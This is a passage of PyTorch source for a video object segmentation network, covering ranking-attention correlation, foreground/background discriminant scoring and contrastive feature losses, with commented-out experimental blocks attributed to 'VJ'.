Feature_4 = f.normalize(self.L4(base_features1[3]))
Feature_5 = f.normalize(f.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = f.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
Kernel_tmp = Ker
Out_Rs = []
basef1 = torch.cat([self.ls13(base_features1[2]),
self.ls14(base_features1[3]),
self.ls15(base_features1[4]), ], 1)
basef2 = torch.cat([self.ls22(base_features1[1]),
self.ls23(base_features1[2]),
self.ls24(base_features1[3]), ], 1)
basef3 = torch.cat([self.ls31(base_features1[0]),
self.ls32(base_features1[1]),
self.ls33(base_features1[2])], 1)
for idx in range(len(Feature)): # batch
ker = Kernel_tmp[idx: idx + 1]
feature = Feature[idx: idx + 1]
m2 = msk2[idx: idx + 1]
mp = msk_p[idx: idx + 1]
max_obj = m2.max().int().data.cpu().numpy()
if max_obj < 2:
m2[0, 0, 0, 0] = 2
max_obj = m2.max().int().data.cpu().numpy()
M2s = self.P2masks(f.relu(m2 - 1), max_obj - 1)
M2_all = m2.ge(1.5).float()
Mps = self.P2masks(f.relu(mp - 1), max_obj - 1)
Mp_all = mp.ge(1.5).float()
# Correlation
W0, H0 = ker.size()[-2::]
W,H = feature.size()[-2::]
# Corr_subs = []
ker_R = self.to_kernel(ker)
corr_R = self.correlate(ker_R, feature)
self_corr_R = self.correlate(ker_R, ker)
# Ranking attention scores
T_corr = f.max_pool2d(corr_R,2).view(-1, W0*H0, W*H//4).transpose(1, 2).view(-1, W*H//4, W0, H0)
R_map = f.relu(self.Ranking(T_corr)) * 0.2
# Rmaps = []
# for idy in range(max_obj): # make corrs (backgrounds(=1) and objs)
# m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
# corr_sub = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
# Corr_subs.append(corr_sub)
# Rmaps.append((R_map * m2_rep).view(-1, 1, W0*H0))
Outs = []
for idy in range(1, max_obj): # training:with_bg, testing: w/o BG
# corr = Corr_subs[idy]
# co_size = Corr_subs[idy].size()[2::]
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
Rmap_idy = (R_map * m2_rep).view(-1, 1, W0*H0)
co_size = corr.size()[2::]
max_only, indices = f.max_pool2d(corr, co_size, return_indices=True)
max_only = max_only.view(-1, 1, W0*H0) + Rmap_idy
############## Addition by VJ
#### For FG, adjust scores based on how close a pixel is to the rest of the FG pixels and how far away it is from BG pixels
# Self correlation is of size: batch_size x W*H x W x H
# We want the final score to be a score on each pixel and thus of dimension: batch_size x W*H x 1 x 1
# Notation meaning: FG_BG: for a WxH map with FG pixels, the channels have non-zero values where
# the channel id corresponds to BG != 0
# FG_FG = []
# FG_BG = []
# BG_BG = []
# BG_FG = []
# for b_iter in range(m2_rep.shape[0]):
# FG_FG.append(self.correlate(m2_rep[b_iter].view(-1, 1, 1, 1),m2_rep[b_iter:b_iter+1]))
# FG_BG.append(self.correlate(1-m2_rep[b_iter].view(-1, 1, 1, 1),m2_rep[b_iter:b_iter+1]))
# BG_FG.append(self.correlate(m2_rep[b_iter].view(-1, 1, 1, 1), 1-m2_rep[b_iter:b_iter+1]))
# BG_BG.append(self.correlate(1-m2_rep[b_iter].view(-1, 1, 1, 1),1-m2_rep[b_iter:b_iter+1]))
# FG_FG = torch.cat(FG_FG,dim=0)
# FG_BG = torch.cat(FG_BG,dim=0)
# BG_FG = torch.cat(BG_FG,dim=0)
# BG_BG = torch.cat(BG_BG,dim=0)
# Score addition for matching to FG a lot and penalty for matching to BG
# We are computing FG discriminant score
# For each pixel in WxH, we can take max or average across non zero channels
# FG_disc_score = f.max_pool2d(FG_FG * self_corr_R, self_corr_R.size()[2::]).view(-1, 1, W0*H0)
# FG_disc_score *= f.relu(\
# -torch.log( (0.000001+f.avg_pool2d(BG_FG * self_corr_R, self_corr_R.size()[2::]).view(-1, 1, W0*H0))/\
# (f.avg_pool2d(BG_FG , self_corr_R.size()[2::]).view(-1, 1, W0*H0) + 0.000001)\
# )\
# )
# num_pixels = 5
# temp_corr = self_corr_R * m2_rep.view(1,W0*H0,1,1)
# FG_disc_score = (temp_corr*m2_rep).reshape(1,-1,W0*H0)
# FG_disc_score, _ = FG_disc_score.sort(descending=True, dim=2)
# FG_disc_score = FG_disc_score[:,:,:num_pixels]
# FG_disc_score = FG_disc_score.sum(dim=2)/(num_pixels)
# FG_neg_score = (temp_corr*(1-m2_rep)).reshape(1,-1,W0*H0)
# FG_neg_score, _ = FG_neg_score.sort(descending=True, dim=2)
# FG_neg_score = FG_neg_score[:,:,:num_pixels]
# FG_neg_score = FG_neg_score.sum(dim=2)/(num_pixels)
# FG_disc_score -= FG_neg_score/2
# del _
# max_only = max_only + FG_disc_score.view(-1,1,W0*H0)*scale_factor
######### Addition by VJ done #################
# Rank & select FG
m_sorted, m_sorted_idx = max_only.sort(descending=True, dim=2)
corr = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr, m_sorted_idx)])
# Merge net FG
corr_fores = self.p_2(self.res_1(self.p_1(f.interpolate(corr, scale_factor=2, mode='bilinear',align_corners=True))))
if max_obj == 1: # only bg
print('missing obj')
corr_backs = torch.zeros(corr_fores.size()).cuda()
else:
'''
backs_idx = Corr_subs[0:idy] + Corr_subs[idy + 1::]
corr_b = torch.cat(backs_idx, 1)
R_map_b = Rmaps[0:idy] + Rmaps[idy + 1::]
R_map_b = torch.cat(R_map_b, 2)
'''
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr_b = (1-m2_rep.view(m2_rep.size()[0], -1, 1, 1) )* corr_R
R_map_b = (R_map * (1-m2_rep)).view(-1, 1, W0*H0)
########## Above added by VJ ###########
max_only_b, indices = f.max_pool2d(corr_b, co_size, return_indices=True)
max_only_b = max_only_b.view(R_map_b.size()[0], 1, -1) + R_map_b
########################################### VJ
# temp_corr = self_corr_R * (1-m2_rep.view(1,W0*H0,1,1))
# BG_disc_score = (temp_corr*(1-m2_rep)).reshape(1,-1,W0*H0)
# BG_disc_score, _ = BG_disc_score.sort(descending=True, dim=2)
# BG_disc_score = BG_disc_score[:,:,:num_pixels]
# BG_disc_score = BG_disc_score.sum(dim=2)/(num_pixels)
# BG_neg_score = (temp_corr*m2_rep).reshape(1,-1,W0*H0)
# BG_neg_score, _ = BG_neg_score.sort(descending=True, dim=2)
# BG_neg_score = BG_neg_score[:,:,:num_pixels]
# BG_neg_score = BG_neg_score.sum(dim=2)/(num_pixels)
# BG_disc_score -= BG_neg_score/2
# del _
# max_only_b = max_only_b + BG_disc_score*scale_factor
############################################ VJ
# Rank & select BG
m_sorted, m_sorted_idx = max_only_b.sort(descending=True, dim=2)
corr_b = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr_b, m_sorted_idx)])
# Merge net BG
corr_backs = self.p_2(self.res_1(self.p_1(f.interpolate(corr_b, scale_factor=2, mode='bilinear',align_corners=True))))
if idy == 0:
tmp = corr_fores
corr_fores = corr_backs
corr_backs = tmp
m_p = f.adaptive_avg_pool2d(Mp_all, corr_fores.size()[-2::])
else:
m_p = f.adaptive_avg_pool2d(Mps[idy], corr_fores.size()[-2::])
# low level features
base1 = torch.cat([basef1[idx: idx + 1], corr_fores, corr_backs, m_p], 1)
fea1 = self.R1(base1)
base2 = torch.cat([basef2[idx: idx + 1],
fea1], 1)
fea2 = self.R2(base2)
base3 = torch.cat([basef3[idx: idx + 1],
fea2], 1)
fea3 = self.R3(base3)
out = f.sigmoid(fea3)
### For each object in the image, create an out map
Outs.append(out)
Out = torch.cat(Outs, 1)
############### Once we have out map for all objects in an image, append it to a per image list
Out_Rs.append(Out)
features = []
out = [Out_Rs]
return out, features
def RANet_Multiple_forward_train(self, template, target, template_msk, target_msk,scale_factor=0):
'''
From the training pass, what we want are:
1. Final predicted masks, to compute the cross-entropy loss against the target masks.
2. Self-correlation matrix (with features) and self mask correlation (FG vs FG, FG vs BG for each object in a frame).
This is to compute the loss for FG features not being close to each other and FG features being close to BG.
3. Target correlation matrix (with features) and target mask correlation (FG vs FG, FG vs BG for each object in
a frame). This is to compute the loss for FG features not being close to each other and FG features being close to BG.
4. Correlation matrix with the target frame and mask correlation matrix with the target frame (FG vs FG, FG vs BG for
each object in a frame). This is again to compute the loss for FG features not being close to each other and FG
features being close to BG.
Item 1 is expected to update the mask prediction network more, while 2, 3 & 4 are expected to update the feature
extraction network.
'''
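# Note: the return statement at the end of this method currently hands back an empty
# list in place of loss_per_batch, so the feature losses assembled below are effectively
# unused. A caller wanting them could aggregate roughly as (a sketch, assuming equal
# weighting of all loss terms):
#   loss = sum(sum(d.values()) for objs in loss_per_batch for d in objs)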
# device = self.base_model.conv1.weight.device
# Extract template features
base_features2 = self.res_forward(template)
Kernel_3 = f.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = f.normalize(self.L4(base_features2[3]))
Kernel_5 = f.normalize(f.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = f.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
Kernel = Kernel_tmp
# Current frame feature
base_features1 = self.res_forward(target)
Feature_3 = f.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
Feature_4 = f.normalize(self.L4(base_features1[3]))
Feature_5 = f.normalize(f.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = f.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
Out_Rs = []
basef1 = torch.cat([self.ls13(base_features1[2]),
self.ls14(base_features1[3]),
self.ls15(base_features1[4]), ], 1)
basef2 = torch.cat([self.ls22(base_features1[1]),
self.ls23(base_features1[2]),
self.ls24(base_features1[3]), ], 1)
basef3 = torch.cat([self.ls31(base_features1[0]),
self.ls32(base_features1[1]),
self.ls33(base_features1[2])], 1)
loss_per_batch = []
for idx in range(len(Feature)): # batch
ker = Kernel_tmp[idx: idx + 1]
feature = Feature[idx: idx + 1]
m1 = target_msk[idx: idx + 1]
m2 = template_msk[idx: idx + 1]
max_obj = m2.max().int().data.cpu().numpy()
if max_obj < 2:
m2[0, 0, 0, 0] = 2
max_obj = m2.max().int().data.cpu().numpy()
M2s = self.P2masks(f.relu(m2 - 1), max_obj - 1)
M2_all = m2.ge(1.5).float()
M1s = self.P2masks(f.relu(m1 - 1), max_obj - 1)
M1_all = m1.ge(1.5).float()
# Correlation
W0, H0 = ker.size()[-2::]
W,H = feature.size()[-2::]
# Corr_subs = []
ker_R = self.to_kernel(ker)
corr_R = self.correlate(ker_R, feature)
template_self_corr = self.correlate(ker_R, ker)
target_self_corr = self.correlate(self.to_kernel(feature), feature)
# Ranking attention scores
T_corr = f.max_pool2d(corr_R,2).view(-1, W0*H0, W*H//4).transpose(1, 2).view(-1, W*H//4, W0, H0)
R_map = f.relu(self.Ranking(T_corr)) * 0.2
# Rmaps = []
# for idy in range(max_obj): # make corrs (backgrounds(=1) and objs)
# m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
# corr_sub = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
# Corr_subs.append(corr_sub)
# Rmaps.append((R_map * m2_rep).view(-1, 1, W0*H0))
Outs = []
loss_per_obj = []
# print("kernel device:", ker.device, "corr_R device:", corr_R.device)
for idy in range(1, max_obj): # training:with_bg, testing: w/o BG
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
Rmap_idy = (R_map * m2_rep).view(-1, 1, W0*H0)
co_size = corr.size()[2::]
max_only, indices = f.max_pool2d(corr, co_size, return_indices=True)
max_only = max_only.view(-1, 1, W0*H0) + Rmap_idy #Rmaps[idy]
#### For FG, adjust scores based on how close a pixel is to the rest of the FG pixels and how far away it is from BG pixels
# Self correlation is of size: batch_size x W*H x W x H
# We want the final score to be a score on each pixel and thus of dimension: batch_size x W*H x 1 x 1
# Notation meaning: FG_BG: for a WxH map with FG pixels, the channels have non-zero values where
# the channel id corresponds to BG != 0
############# Loss for adjusting feature extractor
loss_obj_dict = {}
loss_obj_dict['template_FB_FB_loss'] = 0
loss_obj_dict['template_FB_BG_loss'] = 0
loss_obj_dict['target_FB_FB_loss'] = 0
loss_obj_dict['target_FB_BG_loss'] = 0
loss_obj_dict['tt_FB_FB_loss'] = 0
loss_obj_dict['tt_FB_BG_loss'] = 0
######### For each FG pixel, find closest 5 pixels in FG and sum them up. That is the -ve loss for FG-FG
num_pixels= 5
# ############################## Just template frame
# m2_rep_pos = m2_rep.ge(0.5).float()
# m2_rep_neg = m2_rep.le(0).float()
# if (self.fp16):
# m2_rep_pos = m2_rep_pos.half()
# m2_rep_neg = m2_rep_pos.half()
# indices = torch.nonzero(m2_rep_pos.reshape(-1))
# if (len(indices)>0):
# temp_corr = torch.cat([template_self_corr[:,index,:] for index in indices], dim=1)
# FB_FB_loss = (temp_corr*m2_rep_pos).reshape(1,-1,W0*H0)
# FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
# FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
# FB_BG_loss = (temp_corr*m2_rep_neg).reshape(1,-1,W0*H0)
# FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
# FB_BG_loss = FB_BG_loss[:,:,:num_pixels]
# FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
# FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
# del _
# else:
# FB_FB_loss = 0
# FB_BG_loss = 0
# loss_obj_dict['template_FB_FB_loss'] = -FB_FB_loss
# loss_obj_dict['template_FB_BG_loss'] = FB_BG_loss
# del indices
# ############################## Just target frame
# m1_rep = f.adaptive_avg_pool2d(M1s[idy], ker.size()[-2::])
# m1_rep_pos = m1_rep.ge(0.5).float()
# m1_rep_neg = m1_rep.le(0).float()
# if (self.fp16):
# m1_rep_pos = m1_rep_pos.half()
# m1_rep_neg = m1_rep_pos.half()
# indices = torch.nonzero(m1_rep_pos.reshape(-1))
# if (len(indices)>0):
# temp_corr = torch.cat([target_self_corr[:,index,:] for index in indices], dim=1)
# FB_FB_loss = (temp_corr*m1_rep_pos).reshape(1,-1,W*H)
# FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
# FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
# FB_BG_loss = (temp_corr*m1_rep_neg).reshape(1,-1,W*H)
# FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
# FB_BG_loss = FB_BG_loss[:,:,:num_pixels]
# FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
# FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
# del _
# else :
# FB_FB_loss = 0
# FB_BG_loss = 0
# loss_obj_dict['target_FB_FB_loss'] = -FB_FB_loss
# loss_obj_dict['target_FB_BG_loss'] = FB_BG_loss
# del indices
############################## Between template and target
######### Skip this if there are too many objects
if (idy < 0):
m1_rep = f.adaptive_avg_pool2d(M1s[idy], ker.size()[-2::])
m1_rep_pos = m1_rep.ge(0.5).float()
m1_rep_neg = m1_rep.le(0).float()
m2_rep_pos = m2_rep.ge(0.5).float()
m2_rep_neg = m2_rep.le(0).float()
#### Between FG of template and FG of target
# corr_R is of shape: batch_size x W0*H0 x W x H
# We want FG of both to be close and FG-BG of both to be far
FB_FB_loss = (corr_R*m1_rep_pos).reshape(-1,W0*H0,W*H)
indices1 = torch.nonzero(m1_rep_pos.reshape(-1))
indices2 = torch.nonzero(m2_rep_pos.reshape(-1))
corr_R_transpose = corr_R.view(-1, W0*H0, W*H).transpose(1, 2).view(-1, W*H, W0, H0)
if (len(indices1)>0):
FB_FB_loss1, _ = FB_FB_loss.squeeze().transpose(0,1).sort(descending=True, dim=1)
FB_FB_loss1 = torch.cat([FB_FB_loss1[index,:num_pixels] for index in indices1], dim=0)
FB_FB_loss1 = FB_FB_loss1.sum()/(len(indices1)*num_pixels)
FB_BG_loss1 = (corr_R_transpose*m1_rep_neg).reshape(-1,W*H,W0*H0)
FB_BG_loss1, _ = FB_BG_loss1.squeeze().sort(descending=True, dim=1)
FB_BG_loss1 = torch.cat([FB_BG_loss1[index,:num_pixels] for index in indices1], dim=0)
FB_BG_loss1 = FB_BG_loss1.sum()/(len(indices1)*num_pixels)
del _
else:
FB_FB_loss1 = 0
FB_BG_loss1 = 0
if (len(indices2)>0):
FB_FB_loss2, _ = FB_FB_loss.squeeze().sort(descending=True, dim=1)
FB_FB_loss2 = torch.cat([FB_FB_loss2[index,:num_pixels] for index in indices2], dim=0)
FB_FB_loss2 = FB_FB_loss2.sum()/(len(indices2)*num_pixels)
FB_BG_loss2 = (corr_R*m2_rep_neg).reshape(-1,W0*H0,W*H)
FB_BG_loss2, _ = FB_BG_loss2.squeeze().sort(descending=True, dim=1)
FB_BG_loss2 = torch.cat([FB_BG_loss2[index,:num_pixels] for index in indices2], dim=0)
FB_BG_loss2 = FB_BG_loss2.sum()/(len(indices2)*num_pixels)
del _
else:
FB_FB_loss2 = 0
FB_BG_loss2 = 0
loss_obj_dict['tt_FB_FB_loss'] = -(FB_FB_loss1 + FB_FB_loss2)/2
loss_obj_dict['tt_FB_BG_loss'] = (FB_BG_loss1 + FB_BG_loss2)/2
del indices1,indices2
loss_obj_dict['tt_FB_FB_loss'] = loss_obj_dict['tt_FB_FB_loss']*3 # To compensate for normalization
loss_obj_dict['tt_FB_BG_loss'] = loss_obj_dict['tt_FB_BG_loss']*3 # To compensate for normalization
loss_per_obj.append(loss_obj_dict)
# Score addition for matching to FG a lot and penalty for matching to BG
# We are computing FG discriminant score
# For each pixel in WxH, we can take max or average across non zero channels
# print("template_self_corr shape:",template_self_corr.shape,"m2 rep shape:", m2_rep.shape)
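# FG discriminant score: for every template location, average its similarity to its
# top-`num_pixels` foreground neighbours and subtract half the average similarity to
# its top-`num_pixels` background neighbours; the result, scaled by scale_factor,
# is added to the ranking score before channel selection.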
temp_corr = template_self_corr.data * m2_rep.view(1,W0*H0,1,1).data
FG_disc_score = (temp_corr*m2_rep.data).reshape(1,-1,W0*H0)
FG_disc_score, _ = FG_disc_score.sort(descending=True, dim=2)
FG_disc_score = FG_disc_score[:,:,:num_pixels]
FG_disc_score = FG_disc_score.sum(dim=2)/(num_pixels)
FG_neg_score = (temp_corr*(1-m2_rep.data)).reshape(1,-1,W0*H0)
FG_neg_score, _ = FG_neg_score.sort(descending=True, dim=2)
FG_neg_score = FG_neg_score[:,:,:num_pixels]
FG_neg_score = FG_neg_score.sum(dim=2)/(num_pixels)
FG_disc_score -= FG_neg_score/2
del _
max_only = max_only + FG_disc_score.view(-1,1,W0*H0)*scale_factor
######### Addition by VJ done #################
# Rank & select FG
m_sorted, m_sorted_idx = max_only.sort(descending=True, dim=2)
corr = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr, m_sorted_idx)])
# Merge net FG
corr_fores = self.p_2(self.res_1(self.p_1(f.interpolate(corr, scale_factor=2, mode='bilinear',align_corners=True))))
if max_obj == 1: # only bg
print('missing obj')
corr_backs = torch.zeros(corr_fores.size()).cuda()
else:
'''
backs_idx = Corr_subs[0:idy] + Corr_subs[idy + 1::]
corr_b = torch.cat(backs_idx, 1)
R_map_b = Rmaps[0:idy] + Rmaps[idy + 1::]
R_map_b = torch.cat(R_map_b, 2)
'''
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr_b = (1-m2_rep.view(m2_rep.size()[0], -1, 1, 1) )* corr_R
R_map_b = (R_map * (1-m2_rep)).view(-1, 1, W0*H0)
########## Above added by VJ ###########
max_only_b, indices = f.max_pool2d(corr_b, co_size, return_indices=True)
max_only_b = max_only_b.view(R_map_b.size()[0], 1, -1) + R_map_b
########################################### VJ
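# BG discriminant score: the same top-`num_pixels` neighbour statistic, computed for
# background template locations and added to the background ranking score below.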
num_pixels = 5
temp_corr = template_self_corr.data * (1-m2_rep.data.view(1,W0*H0,1,1))
BG_disc_score = (temp_corr*(1-m2_rep.data)).reshape(1,-1,W0*H0)
BG_disc_score, _ = BG_disc_score.sort(descending=True, dim=2)
BG_disc_score = BG_disc_score[:,:,:num_pixels]
BG_disc_score = BG_disc_score.sum(dim=2)/(num_pixels)
BG_neg_score = (temp_corr*m2_rep.data).reshape(1,-1,W0*H0)
BG_neg_score, _ = BG_neg_score.sort(descending=True, dim=2)
BG_neg_score = BG_neg_score[:,:,:num_pixels]
BG_neg_score = BG_neg_score.sum(dim=2)/(num_pixels)
BG_disc_score -= BG_neg_score/2
del _
max_only_b = max_only_b + BG_disc_score*scale_factor
############################################ VJ
# Rank & select BG
m_sorted, m_sorted_idx = max_only_b.sort(descending=True, dim=2)
corr_b = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr_b, m_sorted_idx)])
# Merge net BG
corr_backs = self.p_2(self.res_1(self.p_1(f.interpolate(corr_b, scale_factor=2, mode='bilinear',align_corners=True))))
if idy == 0:
tmp = corr_fores
corr_fores = corr_backs
corr_backs = tmp
m_2 = f.adaptive_avg_pool2d(M2_all, corr_fores.size()[-2::])
else:
m_2 = f.adaptive_avg_pool2d(M2s[idy], corr_fores.size()[-2::])
# low level features
base1 = torch.cat([basef1[idx: idx + 1], corr_fores, corr_backs, m_2], 1)
fea1 = self.R1(base1)
base2 = torch.cat([basef2[idx: idx + 1],
fea1], 1)
fea2 = self.R2(base2)
base3 = torch.cat([basef3[idx: idx + 1],
fea2], 1)
fea3 = self.R3(base3)
# out = torch.sigmoid(fea3)
out = fea3
### For each object in the image, create an out map
Outs.append(out)
Out = torch.cat(Outs, 1)
############### Once we have out map for all objects in an image, append it to a per image list
Out_Rs.append(Out)
loss_per_batch.append(loss_per_obj)
return Out_Rs, []  # loss_per_batch
def forward_feat_extractor(self, template, target, template_msk, target_msk, cap=0):
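# Compute only the feature-space contrastive losses (template self-similarity, target
# self-similarity, and template<->target similarity) without running the decoder.
# `cap` acts as a margin: FG-vs-BG similarities below `cap` incur no penalty because
# of the torch.clamp(... - cap, min=0) calls below.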
# Extract template features
base_features2 = self.res_forward(template)
Kernel_3 = F.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = F.normalize(self.L4(base_features2[3]))
Kernel_5 = F.normalize(F.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = F.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
Kernel = Kernel_tmp
# Current frame feature
base_features1 = self.res_forward(target)
Feature_3 = F.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
Feature_4 = F.normalize(self.L4(base_features1[3]))
Feature_5 = F.normalize(F.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = F.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
loss_per_batch = []
for idx in range(len(Feature)): # batch
ker = Kernel_tmp[idx: idx + 1]
feature = Feature[idx: idx + 1]
m1 = target_msk[idx: idx + 1]
m2 = template_msk[idx: idx + 1]
max_obj = m2.max().int().data.cpu().numpy()
if max_obj < 2:
m2[0, 0, 0, 0] = 2
max_obj = m2.max().int().data.cpu().numpy()
M2s = self.P2masks(F.relu(m2 - 1), max_obj - 1)
M2_all = m2.ge(1.5).float()
M1s = self.P2masks(f.relu(m1 - 1), max_obj - 1)
M1_all = m1.ge(1.5).float()
# Correlation
W0, H0 = ker.size()[-2::]
W,H = feature.size()[-2::]
Corr_subs = []
ker_R = self.to_kernel(ker)
corr_R = self.correlate(ker_R, feature)
template_self_corr = self.correlate(ker_R, ker)
target_self_corr = self.correlate(self.to_kernel(feature), feature)
for idy in range(max_obj): # make corrs (backgrounds(=1) and objs)
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr_sub = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
Corr_subs.append(corr_sub)
Outs = []
loss_per_obj = []
for idy in range(1, max_obj): # training:with_bg, testing: w/o BG
corr = Corr_subs[idy]
co_size = Corr_subs[idy].size()[2::]
#### For FG, adjust scores based on how close a pixel is to the rest of the FG pixels and how far away it is from BG pixels
# Self correlation is of size: batch_size x W*H x W x H
# We want the final score to be a score on each pixel and thus of dimension: batch_size x W*H x 1 x 1
# Notation meaning: FG_BG: for a WxH map with FG pixels, the channels have non-zero values where
# the channel id corresponds to BG != 0
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
############# Loss for adjusting feature extractor
loss_obj_dict = {}
loss_obj_dict['template_FB_FB_loss'] = 0
loss_obj_dict['template_FB_BG_loss'] = 0
loss_obj_dict['target_FB_FB_loss'] = 0
loss_obj_dict['target_FB_BG_loss'] = 0
loss_obj_dict['tt_FB_FB_loss'] = 0
loss_obj_dict['tt_FB_BG_loss'] = 0
######### For each FG pixel, find closest 5 pixels in FG and sum them up. That is the -ve loss for FG-FG
num_pixels= 5
############################## Just template frame
m2_rep_pos = m2_rep.ge(0.5).float()
m2_rep_neg = m2_rep.le(0).float()
if (self.fp16):
m2_rep_pos = m2_rep_pos.half()
m2_rep_neg = m2_rep_neg.half()
indices = torch.nonzero(m2_rep_pos.reshape(-1))
if (len(indices)>0):
temp_corr = torch.cat([template_self_corr[:,index,:] for index in indices], dim=1)
FB_FB_loss = (temp_corr*m2_rep_pos).reshape(1,-1,W0*H0)
FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
FB_BG_loss = (temp_corr*m2_rep_neg).reshape(1,-1,W0*H0)
FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
FB_BG_loss = torch.clamp(FB_BG_loss[:,:,:num_pixels]-cap, min=0)
FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
del _
else:
FB_FB_loss = 0
FB_BG_loss = 0
loss_obj_dict['template_FB_FB_loss'] = -FB_FB_loss
loss_obj_dict['template_FB_BG_loss'] = FB_BG_loss
del indices
############################## Just target frame
m1_rep = f.adaptive_avg_pool2d(M1s[idy], ker.size()[-2::])
m1_rep_pos = m1_rep.ge(0.5).float()
m1_rep_neg = m1_rep.le(0).float()
if (self.fp16):
m1_rep_pos = m1_rep_pos.half()
m1_rep_neg = m1_rep_neg.half()
indices = torch.nonzero(m1_rep_pos.reshape(-1))
if (len(indices)>0):
temp_corr = torch.cat([target_self_corr[:,index,:] for index in indices], dim=1)
FB_FB_loss = (temp_corr*m1_rep_pos).reshape(1,-1,W*H)
FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
FB_BG_loss = (temp_corr*m1_rep_neg).reshape(1,-1,W*H)
FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
FB_BG_loss = torch.clamp(FB_BG_loss[:,:,:num_pixels]-cap, min=0)
FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
del _
else:
FB_FB_loss = 0
FB_BG_loss = 0
loss_obj_dict['target_FB_FB_loss'] = -FB_FB_loss
loss_obj_dict['target_FB_BG_loss'] = FB_BG_loss
del indices
############################## Between template and target
######### Skip this if there are too many objects
if (max_obj < 10):
#### Between FG of template and FG of target
# corr_R is of shape: batch_size x W0*H0 x W x H
# We want FG of both to be close and FG-BG of both to be far
FB_FB_loss = (corr_R*m1_rep_pos).reshape(-1,W0*H0,W*H)
indices1 = torch.nonzero(m1_rep_pos.reshape(-1))
indices2 = torch.nonzero(m2_rep_pos.reshape(-1))
corr_R_transpose = corr_R.view(-1, W0*H0, W*H).transpose(1, 2).view(-1, W*H, W0, H0)
if (len(indices1)>0):
FB_FB_loss1, _ = FB_FB_loss.squeeze().transpose(0,1).sort(descending=True, dim=1)
FB_FB_loss1 = torch.cat([FB_FB_loss1[index,:num_pixels] for index in indices1], dim=0)
FB_FB_loss1 = FB_FB_loss1.sum()/(len(indices1)*num_pixels)
FB_BG_loss1 = (corr_R_transpose*m1_rep_neg).reshape(-1,W*H,W0*H0)
FB_BG_loss1, _ = FB_BG_loss1.squeeze().sort(descending=True, dim=1)
FB_BG_loss1 = torch.clamp(\
torch.cat([FB_BG_loss1[index,:num_pixels] for index in indices1], dim=0)-cap, min=0)
FB_BG_loss1 = FB_BG_loss1.sum()/(len(indices1)*num_pixels)
del _
else:
FB_FB_loss1 = 0
FB_BG_loss1 = 0
if (len(indices2)>0):
FB_FB_loss2, _ = FB_FB_loss.squeeze().sort(descending=True, dim=1)
FB_FB_loss2 = torch.cat([FB_FB_loss2[index,:num_pixels] for index in indices2], dim=0)
FB_FB_loss2 = FB_FB_loss2.sum()/(len(indices2)*num_pixels)
FB_BG_loss2 = (corr_R*m2_rep_neg).reshape(-1,W0*H0,W*H)
FB_BG_loss2, _ = FB_BG_loss2.squeeze().sort(descending=True, dim=1)
FB_BG_loss2 = torch.clamp(\
torch.cat([FB_BG_loss2[index,:num_pixels] for index in indices2], dim=0)-cap, min=0)
FB_BG_loss2 = FB_BG_loss2.sum()/(len(indices2)*num_pixels)
del _
else:
FB_FB_loss2 = 0
FB_BG_loss2 = 0
loss_obj_dict['tt_FB_FB_loss'] = -(FB_FB_loss1 + FB_FB_loss2)/2
